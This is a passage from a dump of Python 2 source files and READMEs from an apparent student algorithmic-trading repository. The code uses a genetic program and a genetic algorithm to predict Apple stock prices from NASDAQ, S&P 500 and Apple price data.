set(equation_dict.keys()):\n\t\t\tequation_dict[equation] = {}\n\t\t\tequation_dict[equation][error] = 1\n\t\telse:\n\t\t\tequation_dict[equation][error] += 1\n\t\t\n\t#Output Generation Number\n\tfirst_part = colored(\"\\nGENERATION: %d \", 'magenta') %(generation)\n\tboundary = \"=\" * 100\n\tsecond_part = colored(boundary, 'magenta')\n\tprint first_part + second_part\n\t\n\t#Sort based on value of dictionary\n\tsorted_equation = sorted(equation_dict.iteritems(), key=lambda x: x[1])\n\tfor i, equation_and_error in enumerate(sorted_equation):\n\t\tfor j in range(0, equation_and_error[1].values()[0]):\n\t\t\tequation = (colored(\"%s\", 'green') %(equation_and_error[0]))\n\t\t\terror = (colored(\"Fitness: %s\", 'blue') %(equation_and_error[1].keys()[0]))\n\t\t\tprint equation + \" === \" + error\n\t\t\t\n\tpopulation_fitness = map(lambda x: x.fitness, population)\n\tmean_fitness = sum(population_fitness)/float(size)\n\tbest_fitness = min(population_fitness)\t\n\toutput_mean_fitness = colored(\"Mean Fitness: %f\", 'yellow') %(mean_fitness)\t\n\toutput_best_fitness = colored(\"Best Fitness: %f\", 'red') %(best_fitness)\n\tmean_best.write(str(mean_fitness) + \" \" + str(best_fitness) + \"\\n\") #Write to file\n\tprint output_mean_fitness + \"\\n\" + output_best_fitness\n\t\n#Depth of a tree\ndef depth(root):\n if(root == None):\n return 0\n else:\n return 1 + max(depth(root.left), depth(root.right))\n\n#Prints each level\ndef printTree(tree):\t\n root = tree.root\n print \"-----Tree Level by Level--- Depth of Tree: %d\" %(depth(root))\n result = createLeveledTree(root)\n for level_index, level in enumerate(result):\n nodes = []\n for node in level:\n nodes.append(node.value)\n print str(level_index) + \": \" + str(nodes)\n print \"Tree's Fitness: %f \" %(tree.fitness)\n\n#Prints the equation\ndef printEquation(tree):\n\tpath = []\n\trecombination.loadPaths(tree.root, path)\n\tequation = fitness.createEquation(path)\n\tprint equation\n\n#Creates a list of levels of a tree\ndef createLeveledTree(root):\n result = [] \n current = []\n if(root != None):\n current.append(root)\n while (len(current) > 0):\n result.append(current)\n parents = current\n current = []\n for parent in parents:\n if (parent.left != None):\n current.append(parent.left)\n if (parent.right != None):\n current.append(parent.right)\n return result\n\n#Traverses the tree in-order\n#for viewing purposes\ndef inOrderTraversal(root):\n if root == None:\n return\n inOrderTraversal(root.left)\n print root.value\n inOrderTraversal(root.right)\n\n\n#Testing Mutation\ndef testMutation():\n depth = 4\n apple_tree_1 = initialize.initGeneticTree(depth)\n print \"Before Mutation\"\n printTree(apple_tree_1.root)\n mutate(apple_tree_1.root)\n print \"After Mutation\"\n printTree(apple_tree_1.root)\n\n#Testing Crossover\ndef testCrossover():\n depth = 5\n apple_tree_1 = initialize.initGeneticTree(depth)\n apple_tree_2 = initialize.initGeneticTree(depth)\n print \"Before Crossover: \\nTree 1\"\n printTree(apple_tree_1.root)\n print \"Tree 2\"\n printTree(apple_tree_2.root)\n recombination.crossover(apple_tree_1.root, apple_tree_2.root)\n print \"\\nAfter Crossover: \\n Tree 1\"\n\tprintTree(qpple_tree_1) \n\tprint \"Tree 2\"\n\tprintTree(apple_tree_2)\n \n" }, { "alpha_fraction": 0.5077672600746155, "alphanum_fraction": 0.5251294374465942, "avg_line_length": 32.479591369628906, "blob_id": "306a6513be6f4579c03d2673d290bb5bc3d18c46", "content_id": "68e4598809a14c037108ad2b414a5518fc86ad35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3283, "license_type": "no_license", "max_line_length": 117, "num_lines": 98, "path": "/Genetic_algorithm_Tushar/ga/individual.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "\n# import range related functions\n# import representation related functions\n\nimport operator\nimport random\n\nfrom random import randint as ri\nfrom random import uniform as ru\n\nrandom.seed(1234)\n\nclass Individual:\n def __init__(self, number_of_signals, bit_length = 16):\n self.rep = \"\"\n self.sig_size = bit_length\n #self.signal_range = signal_ranges(datasets)\n for i in xrange(number_of_signals):\n random_val = bin(ri(0, 2 ** bit_length))[2:]\n random_val = random_val.zfill(bit_length)\n self.rep = self.rep + random_val \n\n def change_individual(self, bit_string):\n if bit_string != None and type(bit_string) is str:\n self.rep = bit_string\n else:\n print \"incorrect input\"\n\n\n def transform_individual(self, signal_ranges):\n \"\"\" Takes a list of 2 tuples defining the signal ranges and scales the binary string to the appropriate value\n \"\"\"\n num_signals = len(signal_ranges)\n repr_size = len(self.rep)\n n = repr_size / num_signals\n\n individual_signals = [ self.rep[i:i+n] for i in xrange(0, len(self.rep), n) ] \n individual_vals = []\n\n for i in range(num_signals):\n min_val = signal_ranges[i][0]\n max_val = signal_ranges[i][1]\n range_val = abs(max_val - min_val) \n signal_value = min_val + (range_val * (float(int(individual_signals[i], 2)) / 2 ** n))\n individual_vals.append(signal_value)\n\n return individual_vals\n\n\n \n def mutate(self, mutate_probability):\n l = list(self.rep)\n\n for i in xrange(self.sig_size):\n r = ru(0,1)\n if r < mutate_probability:\n for j in xrange(i,self.sig_size, self.sig_size):\n if l[j] == '1':\n l[j] = '0'\n elif l[j] == '0':\n l[j] = '1'\n\n self.rep = \"\".join(l)\n\n\n def crossover_2way(self, other_parent, crossover_probability):\n l1 = len(self.rep)\n l2 = len(other_parent.rep)\n expected_length = 0\n #print \"before crossover\"\n #print self.rep\n #print other_parent.rep\n if l1 == l2:\n expected_length = l1\n tmp_p1 = \"\"\n tmp_p2 = \"\"\n for i in xrange(0, l1 , self.sig_size):\n p1 = self.rep[i: (i+self.sig_size) ]\n p2 = other_parent.rep[i: (i+self.sig_size) ]\n point = ri(0, self.sig_size - 1) \n #print point\n tmp1 = p1[point:]\n tmp2 = p2[point:]\n p1 = p1[:point] + tmp2\n p2 = p2[:point] + tmp1\n tmp_p1 = tmp_p1 + p1\n tmp_p2 = tmp_p2 + p2\n #print \"After crossover\"\n #print tmp_p1\n #print tmp_p2\n # used parent replaces children survivor selection\n if expected_length != 0:\n self.change_individual(tmp_p1.zfill(expected_length))\n other_parent.change_individual(tmp_p2.zfill(expected_length))\n #print \"After crossover\"\n #print self.rep \n #print other_parent.rep \n else:\n print \"length of both parents must be equal\"\n\n" }, { "alpha_fraction": 0.7145061492919922, "alphanum_fraction": 0.7227365970611572, "avg_line_length": 27.159420013427734, "blob_id": "e1e0cbfbe61f447fed676dece925541c4fda8353", "content_id": "1c882cf2b6c1d7ac29cbc2b473d76ff555490cf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1944, "license_type": "no_license", "max_line_length": 77, "num_lines": 69, "path": "/Rahul_Genetic_Program/apple/selection.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: selection\n\n'''\n\tParent Selection\n\tFunctions\n'''\nfrom config import tournament_size\nfrom copy import deepcopy\nfrom random import sample\nfrom random import random\n\n'''\n\tRoullette Wheel\n'''\ndef sortPopulation(population):\n\t#Sort in descending order by fitness(error): highest error --> lowest error\n\tsorted_pop = sorted(population, key=lambda tree: tree.fitness, reverse=True)\n\treturn sorted_pop\n\ndef createRoulletteWheel(population):\n\t#Sum Ranks\n\ttotal = len(population)\t\n\t_rank_sum = reduce(lambda x,y: x+y, xrange(1, total+1))\t\n\t#Assign probability\n\tprobabilities = map(lambda i: i/float(_rank_sum), xrange(1, total+1))\t\n\t#Generate intervals\n\troulletteWheel = map(lambda i: 0, xrange(0, total)) #Fill list with zeroes\n\tfor i,p in enumerate(probabilities):\n\t\tif (i == 0):\n\t\t\troulletteWheel[0] = probabilities[i] \n\t\telse:\n\t\t\troulletteWheel[i] = roulletteWheel[i-1] + probabilities[i]\t\t\n\treturn roulletteWheel\t\n\ndef roulletteParentSelection(roulletteWheel, population):\t\n\tpopulation_size = len(population)\t\n\tsorted_population = sortPopulation(population)\n\tpopulation[:] = []\t\n\tfor i in xrange(0, population_size):\t\n\t\t#0.0 <= X <= 1.0\n\t\tnumber = random()\n\t\tfor j in xrange(0, len(roulletteWheel)):\n\t\t\tif (number <= roulletteWheel[j]):\n\t\t\t\tnew_tree = deepcopy(sorted_population[j])\n\t\t\t\tpopulation.append(new_tree)\t\n\t\t\t\tbreak \t#break out of inner for loop\n\t\n\n'''\n\tTournament Selection\n'''\ndef tournamentParentSelection(population):\n\ttemp_population = deepcopy(population)\t\t\n\tpopulation_size = len(population)\n\tk = tournament_size \n\tpopulation[:] = []\n\tfor p in xrange(0, population_size):\n\t\ttournament = sample(temp_population, k)\t\t\n\t\ttree = bestMatch(tournament)\n\t\tnew_tree = deepcopy(tree)\n\t\tpopulation.append(new_tree)\t\t\n\t\ndef bestMatch(tournament):\n\tfitnesses = map(lambda x: x.fitness, tournament)\n\tbest_fitness = min(fitnesses)\n\tbest_index = fitnesses.index(best_fitness)\n\tbest_tree = tournament[best_index]\n\treturn best_tree\n\n" }, { "alpha_fraction": 0.5741029381752014, "alphanum_fraction": 0.6141445636749268, "avg_line_length": 32.71929931640625, "blob_id": "a72f7ec9d4fd86528e2c93e9d6a8de6995dfb67a", "content_id": "51bd7351f3aaf7ab6299c4f811c8e2ff73bf5b15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3846, "license_type": "no_license", "max_line_length": 119, "num_lines": 114, "path": "/Rahul_Genetic_Program/apple/scrape.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: scrape\n'''\n\t1. Scrapes stock data\n\t2. Structures data\n\t3. Returns data\n'''\n\nimport datetime\nimport random\n\n#Could use a generator, yield\ndef getTerminal():\n\t\n\tterminals = ['apple_open', 'apple_high', 'apple_low', \n\t\t 'apple_close', 'apple_volume', 'nasdaq_open', \n\t\t 'nasdaq_high', 'nasdaq_low', 'nasdaq_close', \n 'nasdaq_volume', 'sp500_open', 'sp500_high', \n\t\t 'sp500_low', 'sp500_close', 'sp500_volume']\n\n\t#Add 10 random coefficients into terminal list\n\t#to be used when applying operators on signals\n\tfor i in range(0,15):\n\t\trandom_integer = random.randint(-500, 500)\n\t\tnumber = random_integer * random.random()\n\t\t#Protect against divide by zero\n\t\tif(number == 0):\n\t\t\tnumber = .0001\n\t\tterminals.append(number)\t\n\n\trandom.shuffle(terminals)\t\n\treturn terminals\n\ndef getFunctional():\n\tfunctionals = ['+' , '/', '*', '-']\t\n\t#Will add math.exp, math.log, math.ln, math.e\t\n\trandom.shuffle(functionals)\n\treturn functionals\n\ndef getNasdaqData():\n\t#Open file reading stream\n\tnasdaq = open('/Users/rahulramakrishnan/Projects/algorithmic-trading/Rahul_Genetic_Program/data/nasdaq.txt', 'r')\t\n\t#Training dates\n\tbegin_date = datetime.date(2011, 01, 01)\t\n\tend_date = datetime.date(2013, 12, 31)\n\t#Set up data structor to store the data\n\tnasdaq_data = []\n\t#Parse file\n\tfor line in nasdaq:\n\t\tinfo = line.split(',')\t\t\n\t\tdate = info[0]\t\n\t\tyear = int(date[:4]) \n\t\tmonth = int(date[5:7]) \n\t\tday = int(date[8:10])\n\t current = datetime.date(year, month, day)\t\n\t\t#Financial Placeholder for current data\n\t\tfinance_dict = {}\n\t\t#Check data date\n\t\tif current >= begin_date and current <= end_date:\n\t\t\t#Store financial data\n\t\t\tfinance_dict[\"nasdaq_open\"] = float(info[1])\n\t\t\tfinance_dict[\"nasdaq_low\"] = float(info[2])\n\t\t\tfinance_dict[\"nasdaq_high\"] = float(info[3])\n\t\t\tfinance_dict[\"nasdaq_close\"] = float(info[4])\n\t\t\tfinance_dict[\"nasdaq_volume\"] = float(info[5])\n\t\t\t#Storing financial data in the list\n\t\t\tnasdaq_data.append(finance_dict)\t\n\treturn nasdaq_data\t\n\n\ndef getAppleData():\t\n\tapple = open('/Users/rahulramakrishnan/Projects/algorithmic-trading/Rahul_Genetic_Program/data/apple_stock.txt', 'r')\n\tbegin_date = datetime.date(2011, 01, 01)\n\tend_date = datetime.date(2013, 12, 31)\n\tapple_data = []\n\tfor line in apple:\n\t\tinfo = line.split(',')\n\t\tdate = info[0]\n\t\tyear = int(date[:4]) \n\t\tmonth = int(date[5:7]) \n\t\tday = int(date[8:10])\n\t\tcurrent = datetime.date(year, month, day)\t\n\t\tfinance_dict = {}\n\t\tif current >= begin_date and current <= end_date:\n\t\t\tfinance_dict[\"apple_open\"] = float(info[1])\n\t\t\tfinance_dict[\"apple_low\"] = float(info[2])\n\t\t\tfinance_dict[\"apple_high\"] = float(info[3])\n\t\t\tfinance_dict[\"apple_close\"] = float(info[4])\n\t\t\tfinance_dict[\"apple_volume\"] = float(info[5])\n\t\t\tapple_data.append(finance_dict)\n\treturn apple_data\t\t\n\n\ndef getSP500Data():\n sp500= open('/Users/rahulramakrishnan/Projects/algorithmic-trading/Rahul_Genetic_Program/data/sp_500.txt', 'r')\n begin_date = datetime.date(2011, 01, 01) \n end_date = datetime.date(2013, 12, 31) \n sp500_data = []\n for line in sp500:\n info = line.split(',')\n date = info[0]\n year = int(date[:4]) \n month = int(date[5:7]) \n day = int(date[8:10])\n current = datetime.date(year, month, day) \n finance_dict = {}\n if current >= begin_date and current <= end_date:\n finance_dict[\"sp500_open\"] = float(info[1])\n finance_dict[\"sp500_low\"] = float(info[2])\n finance_dict[\"sp500_high\"] = float(info[3])\n finance_dict[\"sp500_close\"] = float(info[4])\n finance_dict[\"sp500_volume\"] = float(info[5])\n sp500_data.append(finance_dict)\n return sp500_data\n\n\n" }, { "alpha_fraction": 0.7128547430038452, "alphanum_fraction": 0.7128547430038452, "avg_line_length": 27.33333396911621, "blob_id": "f1ab6c5079644867b1874e78f94918bbdae8f5c7", "content_id": "49c1b0d80eeed1c03a5c87624d8b612c47ba84f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 599, "license_type": "no_license", "max_line_length": 53, "num_lines": 21, "path": "/README.md", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "Evolutionary Computing\n======================\n\n\n**Description:**\nWe have two strategies in predicting\napple stock prices, one is through a \ngenetic program, the other is through a\ngenetic algorithm. Follow the instructions\nin the respective README's in sub repositories.\n\n\n- Genetic Program: Rahul Ramakrishnan\n\t- Evolves a tree based population to minimize\n\t the error between predicted price and actual price\n\t- Uses signals from nasdaq, apple, s&p, and soon to \n be more. \n\n- Genetic Algorithm: Tushar Dadlani\n\t- Evolves a bit string population to guess if the \n\t next day's stock will go up or down. \n\n\n\n" }, { "alpha_fraction": 0.44447752833366394, "alphanum_fraction": 0.5841023921966553, "avg_line_length": 35.4782600402832, "blob_id": "8b9d917900348586ef61f6d9db55e587a1682729", "content_id": "5fb1da6b4a080fd32fbc9034f1add57fab0cb863", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3359, "license_type": "no_license", "max_line_length": 145, "num_lines": 92, "path": "/Rahul_Genetic_Program/analysis/histogram.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Generates a Histogram\n#Rahul Ramakrishnan\n\n\nimport json\nimport os\n\n\n#first_dir = '/Users/rahulramakrishnan/Desktop/Trial_1_Dataset'\n#second_dir = '/Users/rahulramakrishnan/Desktop/Trial_2_Dataset'\n#third_dir = '/Users/rahulramakrishnan/Desktop/Trial_3_Dataset'\n#first_dir = '/Users/rahulramakrishnan/OneDrive/Academia/Stochastic Optimization/Algorithmic_Trading_Data/Tournament Selection Data/T_S_Trial_1'\n#second_dir = '/Users/rahulramakrishnan/OneDrive/Academia/Stochastic Optimization/Algorithmic_Trading_Data/Tournament Selection Data/T_S_Trial_2'\n#third_dir = '/Users/rahulramakrishnan/OneDrive/Academia/Stochastic Optimization/Algorithmic_Trading_Data/Tournament Selection Data/T_S_Trial_3'\n\nmean_histogram = { 0 : 0, \n\t \t 100 : 0,\n\t 1000 : 0, \n \t 10000 : 0,\n\t \t 100000 : 0, \n \t 1000000 : 0,\n\t \t 10000000 : 0, \n\t \t 100000000 : 0, \n\t 1000000000 : 0 }\n\nbest_histogram = { 0 : 0, \n \t 100 : 0,\n \t 1000 : 0, \n \t 10000 : 0,\n \t 100000 : 0, \n \t 1000000 : 0,\n \t 10000000 : 0, \n \t 100000000 : 0, \n \t 1000000000 : 0 } \n\nfiles = []\nfor root, dirs, filenames in os.walk(third_dir):\n\tfor f in filenames:\n\t\tfiles.append(open(os.path.join(root, f), 'r'))\n\nmean_histogram_file = open('./mean_histo_3.txt', 'w')\nbest_histogram_file = open('./best_histo_3.txt', 'w')\n\nfor i in range(1, len(files)):\n\tfor line in files[i]:\t\n\t\twords = line.split(' ')\n\t\tmean = words[0]\n\t\tbest = words[1]\t\n\t\n\t\tmean_num = float(mean)\n\t\tbest_num = float(best)\n\t\n\t \tif mean_num >= 0 and mean_num < 100:\t\t\n\t\t\tmean_histogram[0] += 1\n\t\telif mean_num >= 100 and mean_num < 1000:\t\n\t\t\tmean_histogram[100] += 1\n\t\telif mean_num >= 1000 and mean_num < 10000:\n\t\t\tmean_histogram[1000] += 1\n\t\telif mean_num >= 10000 and mean_num < 100000:\n\t\t\tmean_histogram[10000] += 1\n\t\telif mean_num >= 100000 and mean_num < 1000000:\n\t\t\tmean_histogram[100000] += 1\n\t\telif mean_num >= 1000000 and mean_num < 10000000:\n\t\t\tmean_histogram[1000000] += 1\n\t\telif mean_num >= 10000000 and mean_num < 100000000:\n\t\t\tmean_histogram[10000000] += 1\n\t\telif mean_num >= 100000000 and mean_num < 1000000000:\n\t\t\tmean_histogram[100000000] += 1\t\n\t\telif mean_num >= 1000000000:\n\t\t\tmean_histogram[1000000000] += 1\n\n\t\tif best_num >= 0 and best_num < 100:\n \tbest_histogram[0] += 1\n elif best_num >= 100 and best_num < 1000:\n \tbest_histogram[100] += 1\n elif best_num >= 1000 and best_num < 10000:\n \tbest_histogram[1000] += 1\n elif best_num >= 10000 and best_num < 100000:\n \tbest_histogram[10000] += 1\n elif best_num >= 100000 and best_num < 1000000:\n \tbest_histogram[100000] += 1\n elif best_num >= 1000000 and best_num < 10000000:\n \tbest_histogram[1000000] += 1\n elif best_num >= 10000000 and best_num < 100000000:\n \tbest_histogram[10000000] += 1\n elif best_num >= 100000000 and best_num < 1000000000:\n \tbest_histogram[100000000] += 1 \n elif best_num >= 1000000000:\n \tbest_histogram[1000000000] += 1\n\njson.dump(mean_histogram, mean_histogram_file)\njson.dump(best_histogram, best_histogram_file)\n\n\t\n" }, { "alpha_fraction": 0.7863247990608215, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 28.25, "blob_id": "40e94f2a80eb723ab4f677b0829e6c6be0fd462e", "content_id": "7d36f975edc519fe18e9844c80706db9d3abb981", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 117, "license_type": "no_license", "max_line_length": 78, "num_lines": 4, "path": "/Genetic_algorithm_Tushar/README.txt", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "Ideas: \n\n1. Binary String representation to start with as we would be just predicting a\npositive or negative change.\n" }, { "alpha_fraction": 0.5463888049125671, "alphanum_fraction": 0.5563802719116211, "avg_line_length": 32.342857360839844, "blob_id": "733e449e6528cac4113b7bb1c6e0f6d8d5685af2", "content_id": "f37d5853b5c33e0028b17cfbf5f461420ff6cf56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3503, "license_type": "no_license", "max_line_length": 91, "num_lines": 105, "path": "/Genetic_algorithm_Tushar/ga/population.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "import random\nimport math\nimport operator\n\nfrom individual import Individual\n\nrandom.seed(1234)\n\ndef percent_diff(approx , correct):\n #print \"approx, correct\"\n #print approx, correct\n return ((approx - correct) / float(correct))\n\n\nclass Population(object):\n def __init__(self, size, signal_ranges, data, pm = 1/16.0 , pc = 0.7):\n individual_size = len(signal_ranges)\n self.population = []\n self.signal_ranges = signal_ranges\n self.pm = pm\n self.pc = pc\n self.size = size\n self.num_signals = len(signal_ranges)\n self.data = data\n #print \"self.data\"\n #print self.data\n self.data_size = len(data)\n for i in xrange(size):\n self.population.append(Individual(individual_size))\n\n\n def __getitem__(self, key):\n return self.population[key]\n\n def fitness_function(self, individual):\n transformed_individual = individual.transform_individual(self.signal_ranges)\n #print \"Transformed individual\"\n #print transformed_individual\n positive = 0\n count = 0\n for element in self.data:\n #one_iter = []\n #print \"element\"\n #print element\n for item in xrange(self.num_signals):\n #for item in xrange(3):\n \n #threshold = int(0.6 * self.num_signals)\n #print \"GA, value\"\n #print transformed_individual[item]\n #print \"actual value\"\n #print element[item]\n #print \"Delta\"\n #print transformed_individual[item] - element[item]\n #one_iter.append(percent_diff(transformed_individual[item], element[item]))\n #print transformed_individual[item]\n #print \"element[item]\"\n #print element[item]\n #print \"abs percent diff\"\n #print percent_diff(transformed_individual[item], element[item])\n if abs(percent_diff(transformed_individual[item], element[item])) < 0.5 :\n count = count + 1\n #print positive\n #return float(positive) / self.data_size\n #return float(positive) \n #print one_iter\n #print \"count\"\n #print count\n total_items = self.num_signals * self.data_size\n val = float(count) / total_items\n return val\n\n\n def sus_sampler(self, fitness_list):\n size = len(fitness_list)\n total_fitness = reduce(operator.add, fitness_list)\n\n if total_fitness == 0.0:\n print \"total_fitness == 0\"\n sel_prob_list = fitness_list\n else:\n sel_prob_list = [x/ total_fitness for x in fitness_list]\n summed_prob_list = []\n for i in xrange(1, len(sel_prob_list) + 1):\n summed_prob_list.append(reduce(operator.add, sel_prob_list[:i]))\n #print summed_prob_list\n \n\n i = 0\n r = random.uniform(0, 1.0/size)\n mating_pool = []\n while len(mating_pool) <= size -1:\n while r < summed_prob_list[i]:\n mating_pool.append(self.population[i])\n r = r + 1.0/size\n i += 1\n self.population = mating_pool\n\n def mutation(self):\n for individual in self.population:\n individual.mutate(self.pm)\n\n def crossover(self):\n for i in xrange(0, self.size, 2):\n self.population[i].crossover_2way(self.population[i+1], self.pc)\n\n\n" } ]
21
Caleb-Grode/bluewhale
https://github.com/Caleb-Grode/bluewhale
6b2486ca26d68f585c4ed600fedf5954a6282dc7
a7c121ec6b6ae8039c434598e5dcc02ce4688792
6d378d288be1fe28c1e914cc692bc9477e04bac6
refs/heads/main
2023-06-29T03:58:40.194698
2021-08-06T22:00:43
2021-08-06T22:00:43
383,904,684
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5951219797134399, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 34.775001525878906, "blob_id": "1d349c3e577823c25c63093e6ece4d6b21acdcbc", "content_id": "6e649c48fcda32052adf08fe84387fce4bc18498", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1435, "license_type": "no_license", "max_line_length": 117, "num_lines": 40, "path": "/bluewhale_vm_provider_category_list.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: return the virtual machines from a given provider in a given compute category\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\n\ndef lambda_handler(event, context):\n # parameters\n provider = event['queryStringParameters']['provider']\n category = event['queryStringParameters']['category']\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get azure and gcp vm data\n third_party_vm = table.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq(provider)\n & Attr('virtual machine type').eq(category)\n )\n \n # json does not support the decimal type that DynamoDB stores our numbers as so we need to re-cast the data types\n for item in third_party_vm['Items']:\n print(item)\n if 'MemoryMB' in item:\n item['MemoryMB'] = int(item['MemoryMB'])\n if 'vCPUs' in item:\n item['vCPUs'] = int(item['vCPUs'])\n if 'vCPUsPerCore' in item:\n item['vCPUsPerCore'] = int(item['vCPUsPerCore'])\n \n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(third_party_vm)\n }\n " }, { "alpha_fraction": 0.7331887483596802, "alphanum_fraction": 0.7418655157089233, "avg_line_length": 34.42307662963867, "blob_id": "dafbf3989b0d5a1406f74166c95b20a395716571", "content_id": "b4aa0ca25129b249a226902b57dd01f3ae62e7d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 922, "license_type": "no_license", "max_line_length": 109, "num_lines": 26, "path": "/testing+data/azureAPI.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import requests\nimport adal\nimport json\nimport os\n\n# call azure API!\n\n# info for azure authentification\nazure_client_id = os.environ['azure_client_id']\nazure_secret = os.environ['azure_secret']\nazure_subscription_id = os.environ['azure_subscription_id']\nazure_tenant = os.environ['azure_tenant']\nauthority_url = 'https://login.microsoftonline.com/' + azure_tenant\nresource = 'https://management.azure.com/'\n\ncontext = adal.AuthenticationContext(authority_url)\ntoken = context.acquire_token_with_client_credentials(resource, azure_client_id, azure_secret)\n\nheaders = {'Authorization': 'Bearer ' + token['accessToken'], 'Content-Type': 'application/json'}\n\nparams = {'api-version': '019-04-01'}\nurl = 'https://management.azure.com/subscriptions/'+azure_subscription_id+'/providers/Microsoft.Compute/skus'\n\nr = requests.get(url, headers=headers, params=params)\n\nprint(json.dumps(r.json(), indent=4, separators=(',', ': ')))\n\n" }, { "alpha_fraction": 0.5926773548126221, "alphanum_fraction": 0.5997711420059204, "avg_line_length": 39.841121673583984, "blob_id": "d424f497a096c58c3942048e27eeafc87150276d", "content_id": "2bdbbb28eb5c86684fb38c062fd8c59357cd85f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4370, "license_type": "no_license", "max_line_length": 136, "num_lines": 107, "path": "/bluewhale_aws_refresh.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: This function calls an EC2 API to retrieve specs about the different AWS EC2 offerings. \n# It categorizes and selects the desired specs for every returned instance and puts them into the DynamoDB\n# Table 'bluewhale_resources'\n\n\nimport boto3\nimport json\n\ndef ebs_refresh():\n # this is one of the few hard coded values, if a new category is updated, this will need to change\n ebs_categories = ['Magnetic', 'General Purpose', 'Provisioned IOPS', 'Throughput Optimized HDD', 'Cold HDD']\n\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n # get all ebs products\n # this block is an API call that parses the json data\n ebs_details = []\n ebs_names = []\n for ebs_type in ebs_categories:\n response = [\"NextToken\"]\n while \"NextToken\" in response:\n response = pricing_client.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_type}])\n\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n name = priceItemJson['product'][\"attributes\"]['volumeApiName']\n if name not in ebs_names:\n ebs_names.append(name)\n ebs_details.append(priceItemJson)\n \n # we now have data about the volumes but need to parse out and only grab that data we want for the DB\n refresh_data = []\n # get the name and attributes for each!\n for details in ebs_details:\n attrs = details['product']['attributes']\n ebs_data = {}\n ebs_data['name'] = attrs['volumeApiName']\n ebs_data['provider'] = 'AWS'\n ebs_data['resource type'] = 'virtual disk'\n ebs_data['maxIopsvolume'] = attrs['maxIopsvolume']\n ebs_data['maxThroughputvolume'] = attrs['maxThroughputvolume']\n ebs_data['maxVolumeSize'] = attrs['maxVolumeSize']\n ebs_data['storageMedia'] = attrs['storageMedia']\n ebs_data['volumeType'] = attrs['volumeType']\n ebs_data['MaxSizeGiB'] = int(attrs['maxVolumeSize'].split(' ')[0]) * 1024\n refresh_data.append(ebs_data)\n \n return refresh_data\n\ndef lambda_handler(event, context):\n # get ec2 instance information\n data = boto3.client('ec2').describe_instance_types()\n \n instances = data['InstanceTypes']\n \n while \"NextToken\" in data:\n data = boto3.client('ec2').describe_instance_types(NextToken=data[\"NextToken\"])\n instances.extend(data['InstanceTypes'])\n \n # associates name with compute category\n vm_types = {\n 'm':'general purpose', 't':'general purpose', 'a':'general purpose', \n 'c':'compute optimized',\n 'r':'memory optimized', 'u':'memory optimized', 'x':'memory optimized', 'z':'memory optimized',\n 'i':'storage optimized', 'd':'storage optimized','h':'storage optimized',\n 'p':'accelerated computing', 'inf':'accelerated computing', 'g':'accelerated computing', 'f':'accelerated computing' \n }\n \n print(len(instances))\n ec2_specs = []\n for instance in instances:\n # categorize instance\n if instance['InstanceType'][0] == 'i': # this block catches edge case where two different categories of instances start with 'i'\n if instance['InstanceType'][1] == '3':\n type = 'storage optimized'\n else:\n type = 'accelerated computing'\n else:\n type = vm_types[instance['InstanceType'][0]]\n \n # get data ready to be put in DB\n ec2_specs.append(\n {\n 'name': instance['InstanceType'],\n 'resource type' : 'virtual machine',\n 'virtual machine type' : type,\n 'vCPUs': int(instance['VCpuInfo']['DefaultVCpus']),\n 'MemoryMB': int(int(instance['MemoryInfo']['SizeInMiB']) * 1.049), # conver from Mib to \n 'NetworkInfo': instance['NetworkInfo'],\n 'provider': 'AWS'\n \n }\n )\n \n # put data in DB\n table = boto3.resource('dynamodb').Table('bluewhale_resources')\n for item in ec2_specs:\n table.put_item(Item=item)\n for item in ebs_refresh():\n table.put_item(Item=item)\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Refresh complete!')\n }\n" }, { "alpha_fraction": 0.6517241597175598, "alphanum_fraction": 0.6735632419586182, "avg_line_length": 35.29166793823242, "blob_id": "c82864ea9d0755c9e788835a962280db2969c2a4", "content_id": "7a93f3fb0b53692bc19905908817283e0368fb06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 166, "num_lines": 24, "path": "/testing+data/closeNumberTest.py", "repo_name": 